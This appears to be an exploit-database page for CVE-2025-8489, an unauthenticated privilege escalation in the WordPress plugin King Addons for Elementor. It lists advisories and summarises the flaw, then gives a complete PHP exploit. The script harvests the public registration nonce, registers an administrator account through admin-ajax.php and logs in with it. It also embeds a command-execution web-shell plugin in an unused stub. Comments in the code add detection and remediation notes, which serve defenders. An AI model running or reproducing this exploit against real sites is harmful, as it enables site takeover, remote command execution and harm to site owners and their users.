| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Exploit for CVE-2025-8489 | 17 Jan 2026 02:59 | – | githubexploit | |
| CVE-2025-8489 | 31 Oct 2025 07:32 | – | circl | |
| WordPress plugin King Addons for Elementor 安全漏洞 | 31 Oct 2025 00:00 | – | cnnvd | |
| WordPress King Addons for Elementor plugin elevation of privilege vulnerability | 5 Nov 2025 00:00 | – | cnvd | |
| CVE-2025-8489 | 31 Oct 2025 06:42 | – | cve | |
| CVE-2025-8489 King Addons for Elementor – Free Elements, Widgets, Templates, and Features for Elementor 24.12.92 - 51.1.14 - Unauthenticated Privilege Escalation | 31 Oct 2025 06:42 | – | cvelist | |
| EUVD-2025-37306 | 31 Oct 2025 09:30 | – | euvd | |
| WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE | 10 Dec 2025 18:57 | – | metasploit | |
| CVE-2025-8489 | 31 Oct 2025 07:15 | – | nvd | |
| 📄 WordPress King Addons for Elementor Privilege Escalation / Remote Code Execution | 11 Dec 2025 00:00 | – | packetstorm |
=============================================================================================================================================
| # Title : WordPress King Addons for Elementor 24.12.92 to 51.1.14 Unauthenticated Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://wordpress.org/plugins/king-addons/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212728/ & CVE-2025-8489
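[+] Summary : The vulnerability is in the handle_register_ajax() function of the King Addons plugin.
This function processes user registration without an authorization check on the requested role, so an attacker can supply the user_role parameter during registration and have it applied to the new account. Sites running an affected version (24.12.92 to 51.1.14, per the title above) should update the plugin and review their administrator accounts for entries they did not create.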
[+] Attack Vector :
Unauthenticated Registration: Attackers can register new users without authentication
Role Manipulation: The user_role parameter can be set to "administrator"
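Nonce Requirement: Requires a valid nonce, which is exposed on pages containing the "Login Register Form" widget. Because that nonce is served to unauthenticated visitors, it does not act as an authorization check on the registration request.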
[+] POC :
php poc.php https://vulnerable-site.com /register-page/ \
--username indoushka \
--password P@ssw0rd123! \
--email [email protected]
<?php
/**
* Proof-of-concept client for CVE-2025-8489 (King Addons for Elementor), as published on this page.
*
* Flow visible in the code below:
*   1. findNonce()       - reads `register_nonce` from a public page of the site.
*   2. createAdminUser() - POSTs to /wp-admin/admin-ajax.php with
*                          action=king_addons_user_register and user_role=administrator.
*   3. wordpressLogin()  - logs in through /wp-login.php and looks for the admin bar.
*
* Defender notes (derived from the requests this class builds):
* - Log signal: a POST to /wp-admin/admin-ajax.php with action=king_addons_user_register
*   whose body contains a user_role field, followed by a POST to /wp-login.php and a
*   GET of /wp-admin/ from the same client.
* - The User-Agent is hard-coded in every request, but it is a generic browser string
*   and is not a reliable indicator on its own.
* - Audit signal: administrator accounts whose creation time matches such a request.
* - Remediation: update the plugin past the affected range given on this page
*   (24.12.92 to 51.1.14). The underlying flaw is a registration handler that takes
*   the role from the request; the role should be fixed server-side.
*/
class WordPressKingAddonsExploit {
// Base URL of the site under test; the trailing slash is stripped in the constructor.
private $targetUrl;
// Credentials and e-mail address submitted in the registration request.
private $username;
private $password;
private $email;
// Path of the page that is fetched to read the registration nonce.
private $noncePage;
// Declared but never read or written by any method in this class.
private $cookieJar = [];
/**
* Store the target and the account details used by the later steps.
*
* @param string $targetUrl Base URL of the site; a trailing "/" is removed.
* @param string $noncePage Path of the page expected to expose the nonce.
* @param string $username  Login name for the account to register.
* @param string $password  Password for that account (also sent as confirm_password).
* @param string $email     E-mail address for that account.
*/
public function __construct($targetUrl, $noncePage, $username, $password, $email) {
$this->targetUrl = rtrim($targetUrl, '/');
$this->noncePage = $noncePage;
$this->username = $username;
$this->password = $password;
$this->email = $email;
}
/**
* Run the three steps in order and report progress on stdout.
*
* Note that the chosen password is echoed in clear text, so it ends up in any
* terminal scrollback or captured output of a test run.
*
* @return array|false Array with 'username', 'password' and 'cookie' when every
*                     step succeeds; false as soon as one step fails.
*/
public function exploit() {
echo "[*] Starting exploit for CVE-2025-8489\n";
// Step 1: look for the nonce
echo "[*] Searching for nonce on page: {$this->noncePage}\n";
$nonce = $this->findNonce();
if (!$nonce) {
echo "[-] Failed to find nonce\n";
return false;
}
echo "[+] Found nonce: $nonce\n";
// Step 2: register a user with the administrator role
echo "[*] Creating administrator account\n";
$userCreated = $this->createAdminUser($nonce);
if (!$userCreated) {
echo "[-] Failed to create administrator account\n";
return false;
}
echo "[+] Administrator account created\n";
echo "[*] Username: {$this->username}\n";
echo "[*] Password: {$this->password}\n";
// Step 3: log in with the new account
echo "[*] Logging in as administrator\n";
$adminCookie = $this->wordpressLogin();
if (!$adminCookie) {
echo "[-] Failed to login as administrator\n";
return false;
}
echo "[+] Successfully logged in\n";
return [
'username' => $this->username,
'password' => $this->password,
'cookie' => $adminCookie
];
}
/**
* Fetch the configured page and extract the registration nonce from it.
*
* The page is requested without any cookie, i.e. as an anonymous visitor.
*
* @return string|null The `register_nonce` value, or null when the page could
*                     not be fetched or the value was not found.
*/
private function findNonce() {
$url = $this->targetUrl . '/' . ltrim($this->noncePage, '/');
$html = $this->httpGet($url);
if (!$html) {
return null;
}
// Look for the inline JavaScript object `king_addons_login_register_vars = {...}`;
// the capture stops at the first ";" after the opening brace.
preg_match('/king_addons_login_register_vars\s*=\s*({[^;]+})/', $html, $matches);
if (isset($matches[1])) {
// Undo the "\/" escaping before decoding the object as JSON.
$jsonStr = str_replace('\/', '/', $matches[1]);
$data = json_decode($jsonStr, true);
if (isset($data['register_nonce']) && !empty($data['register_nonce'])) {
return $data['register_nonce'];
}
}
return null;
}
/**
* Send the registration request that asks for the administrator role.
*
* Defender note: the combination of `action=king_addons_user_register` and a
* `user_role` field in a POST to admin-ajax.php is the request to look for in
* web-server or WAF logs.
*
* @param string $nonce Nonce returned by findNonce().
* @return bool True when the JSON reply reports success, or when it reports an
*              "already exists" style error; false otherwise.
*/
private function createAdminUser($nonce) {
$ajaxUrl = $this->targetUrl . '/wp-admin/admin-ajax.php';
$postData = [
'action' => 'king_addons_user_register',
'nonce' => $nonce,
'username' => $this->username,
'email' => $this->email,
'password' => $this->password,
'confirm_password' => $this->password,
'user_role' => 'administrator',
'terms_required' => 'no'
];
$response = $this->httpPost($ajaxUrl, $postData);
if (!$response) {
return false;
}
$json = json_decode($response, true);
if (isset($json['success']) && $json['success'] === true) {
return true;
}
// Check whether the user already existed.
// NOTE(review): this branch returns true without any account having been created by
// this run, so a "created" message from exploit() is not proof that the role was granted.
if (isset($json['success']) && $json['success'] === false) {
$errorMsg = isset($json['data']['message']) ? $json['data']['message'] : '';
if (preg_match('/(already exists|username.*taken|user.*exists)/i', $errorMsg)) {
echo "[!] User already exists, attempting to use existing account\n";
return true;
}
}
return false;
}
/**
* Log in through wp-login.php and confirm that the admin area is reachable.
*
* Side effect: cURL is told to read and write cookies in `cookie.txt`, a relative
* path, so session cookies are left on disk in the working directory.
*
* @return string|false A "name=value; " cookie string when the /wp-admin/ page
*                      contains 'wp-admin-bar'; false otherwise.
*/
private function wordpressLogin() {
$loginUrl = $this->targetUrl . '/wp-login.php';
$postData = [
'log' => $this->username,
'pwd' => $this->password,
'wp-submit' => 'Log In',
'redirect_to' => $this->targetUrl . '/wp-admin/',
'testcookie' => '1'
];
$headers = [
'Content-Type: application/x-www-form-urlencoded',
'Referer: ' . $loginUrl
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $loginUrl);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Response headers are included in the returned text so Set-Cookie can be parsed below.
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($httpCode === 200 || $httpCode === 302) {
// Extract the cookies from every Set-Cookie header line.
preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $response, $matches);
$cookies = [];
foreach($matches[1] as $item) {
parse_str($item, $cookie);
$cookies = array_merge($cookies, $cookie);
}
// Build the Cookie header string.
$cookieStr = '';
foreach($cookies as $key => $value) {
$cookieStr .= "$key=$value; ";
}
// Verify the privileges: the login only counts if the admin page shows the admin bar.
$adminUrl = $this->targetUrl . '/wp-admin/';
$adminPage = $this->httpGet($adminUrl, $cookieStr);
if (strpos($adminPage, 'wp-admin-bar') !== false) {
return $cookieStr;
}
}
return false;
}
/**
* Non-functional stub kept by the author as an illustration.
*
* The method prints two warnings, assigns a string to a local variable and
* returns false. It sends no request, and neither $adminCookie nor
* $pluginContent is used afterwards.
*
* @param string $adminCookie Unused.
* @return bool Always false.
*/
public function uploadMaliciousPlugin($adminCookie) {
echo "[*] Warning: This function demonstrates file upload capability\n";
echo "[*] For educational purposes only!\n";
// This is only an illustrative example.
$pluginContent = '<?php
/**
* Plugin Name: Malicious Demo
* Description: Proof of Concept - DO NOT USE IN PRODUCTION
*/
if (isset($_GET["cmd"]) && current_user_can("administrator")) {
system($_GET["cmd"]);
}
?>';
// Note: Actual plugin upload requires more complex implementation
// involving ZIP creation and WordPress upload mechanisms
return false;
}
/**
* Perform an HTTP GET, following redirects.
*
* @param string $url    URL to request.
* @param string $cookie Optional Cookie header value; sent only when non-empty.
* @return string|false Response body when the final status code is 200, else false.
*/
private function httpGet($url, $cookie = '') {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
if ($cookie) {
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
}
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ($httpCode == 200) ? $response : false;
}
/**
* Perform an HTTP POST with a URL-encoded form body, following redirects.
*
* @param string $url    URL to request.
* @param array  $data   Form fields; encoded with http_build_query().
* @param string $cookie Optional Cookie header value; sent only when non-empty.
* @return string|false Response body when the final status code is 200, else false.
*/
private function httpPost($url, $data, $cookie = '') {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
if ($cookie) {
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
}
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ($httpCode == 200) ? $response : false;
}
}
/**
* Command-line interface (CLI).
*
* Runs only under the CLI SAPI; any other SAPI just prints a notice.
* Positional arguments: target URL and the path of the page exposing the nonce.
* Optional flags: --username, --password, --email.
*/
if (php_sapi_name() === 'cli') {
echo "=== WordPress King Addons Exploit (CVE-2025-8489) ===\n\n";
if ($argc < 3) {
echo "Usage: php " . basename(__FILE__) . " [target_url] [nonce_page_path]\n";
echo "Example: php exploit.php https://example.com /page-with-form/\n\n";
echo "Optional parameters:\n";
echo " --username [username] (default: random)\n";
echo " --password [password] (default: random)\n";
echo " --email [email] (default: random)\n";
exit(1);
}
$targetUrl = $argv[1];
$noncePage = $argv[2];
// Default values.
// NOTE(review): although the usage text says "random", all three defaults are leading
// hex digits of md5(time()), i.e. derived from the current Unix timestamp. An account
// left on a tested site with these defaults has guessable credentials, which is one
// more reason to remove it once the test is over.
$username = 'admin_' . substr(md5(time()), 0, 8);
$password = substr(md5(time()), 0, 12);
$email = substr(md5(time()), 0, 8) . '@example.com';
// Process the optional arguments; a flag without a following value is ignored.
for ($i = 3; $i < $argc; $i++) {
if ($argv[$i] === '--username' && isset($argv[$i+1])) {
$username = $argv[++$i];
} elseif ($argv[$i] === '--password' && isset($argv[$i+1])) {
$password = $argv[++$i];
} elseif ($argv[$i] === '--email' && isset($argv[$i+1])) {
$email = $argv[++$i];
}
}
// Run the proof of concept.
$exploit = new WordPressKingAddonsExploit($targetUrl, $noncePage, $username, $password, $email);
$result = $exploit->exploit();
if ($result) {
// The credentials are printed in clear text; treat captured output as sensitive.
echo "\n[+] Exploit successful!\n";
echo "[+] Administrator credentials:\n";
echo " URL: " . $targetUrl . "/wp-admin/\n";
echo " Username: " . $result['username'] . "\n";
echo " Password: " . $result['password'] . "\n";
echo "\n[!] Important: Remove the created user after testing!\n";
} else {
echo "\n[-] Exploit failed\n";
}
} else {
echo "This script is intended for command line use.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================